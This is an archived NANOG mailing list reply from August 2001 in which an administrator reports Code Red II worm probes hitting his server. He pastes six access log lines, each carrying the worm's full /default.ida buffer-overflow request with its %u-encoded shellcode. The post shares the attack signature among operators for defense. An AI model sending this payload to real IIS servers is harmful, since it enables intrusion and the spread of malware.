nanog mailing list archives
Re: Code Red Hammering Away
From: Bob K <melange () yip org>
Date: Sat, 4 Aug 2001 17:14:09 -0400 (EDT)
On Sat, 4 Aug 2001, Av wrote:
4:53:48pm|melange@host:/home/melange> grep default.ida /var/log/httpd-access.log | grep XXXXX | wc -l 6I've started seeing LOTS of XXXXX hits as of approx 1 hour ago. 5 in one hour and counting...
Just for reference, here's the logs of this new variant: 211.194.55.233 - - [04/Aug/2001:11:52:42 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 281 "-" "-" 213.57.146.75 - - [04/Aug/2001:14:38:06 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 282 "-" "-" 202.110.201.18 - - [04/Aug/2001:14:46:37 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 273 "-" "-" 200.203.173.193 - - [04/Aug/2001:15:25:40 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 276 "-" "-" user-v3qslgs.biz.mindspring.com - - [04/Aug/2001:15:40:06 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 276 "-" "-" 202.106.106.190 - - [04/Aug/2001:15:57:10 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 735 "-" "-" Note that the earliest one hit at 11:52 today... -- Bob <melange () yip org> | Yes. I know. That is, indeed, *not* mayonnaise.
Current thread:
- Code Red Hammering Away Lou Katz (Aug 04)
- Re: Code Red Hammering Away michael (Aug 04)
- Re: Code Red Hammering Away Etaoin Shrdlu (Aug 04)
- Re: Code Red Hammering Away michael (Aug 04)
- Re: Code Red Hammering Away Etaoin Shrdlu (Aug 04)
- Re: Code Red Hammering Away Gregory (Grisha) Trubetskoy (Aug 04)
- Re: Code Red Hammering Away michael (Aug 04)
- Re: Code Red Hammering Away Bob K (Aug 04)
- Re: Code Red Hammering Away michael (Aug 04)
- Re: Code Red Hammering Away Av (Aug 04)
- Re: Code Red Hammering Away Bob K (Aug 04)
- Re: Code Red Hammering Away Sameh Ghane (Aug 04)
- Re: Code Red Hammering Away Advanced Hosting UNIX Admin Daniel Fairchild (Aug 04)
- Re: Code Red Hammering Away michael (Aug 04)
- Re: Code Red Hammering Away William Allen Simpson (Aug 04)
- Re: Code Red Hammering Away michael (Aug 04)
- Re: Code Red Hammering Away michael (Aug 04)
- Re: Code Red Hammering Away Simon Lyall (Aug 04)
- <Possible follow-ups>
- RE: Code Red Hammering Away Joe Blanchard (Aug 04)
- RE: Code Red Hammering Away Joe Blanchard (Aug 04)
- RE: Code Red Hammering Away Roeland Meyer (Aug 04)